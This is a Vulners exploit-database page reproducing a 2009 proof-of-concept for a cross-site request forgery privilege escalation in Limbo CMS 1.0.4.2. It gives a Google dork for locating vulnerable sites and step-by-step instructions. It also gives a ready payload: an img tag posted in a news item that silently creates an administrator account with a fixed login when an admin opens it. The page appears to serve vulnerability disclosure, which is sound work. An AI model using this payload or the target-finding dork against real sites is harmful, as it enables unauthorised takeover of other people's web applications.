Vulners
Lucene search
Limbo CMS 1.0.4.2 CSRF Privilege Escalation PoC
###############################
# #
# Limbo cms v 1042Lt #
# Cross-site request forgery #
# Privilege Escalation #
# Proof of Concept #
# by Alfons Luja #
# #
###############################
download : http://www.limboportal.com/index.php/option/downloads/task/download/id/67
d00rk: intext:"site powered by limbo" inurl:task=register
Sytuacion is similar to last vuln in Coppermine
http://milw0rm.com/exploits/8114
We need privilege to add news
if we have it then:
1]. Go to : http://target/~limbo/index.php?option=content&task=new&Itemid=[id]
2]. Set Title : whatever
Select Category : whatever
Set Intro text :
<img src="http://target/~limbo/admin.php?com_option=users&task=create&user_id=&user_name=toxiclove&user_username=echo&user_email=skk%40sk.pl&user_gid=5&user_password=test1"/>
(some html tags is not filtered)
Set Main Text : whatever
And submit
3]. When admin open this "new" in Control Panel
User toxiclove witch login = echo , pass = test1 && Administartor privilage
Become create
4]. The end
Greetings:
tyko dla babci i Gorionka , sIdq , condiego , 0ina , J.Busha , Nejmo , and all friend in a whole planet
Sorry for my poor english ;D
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Apr 2009 00:00Current
7.1High risk
Vulners AI Score7.1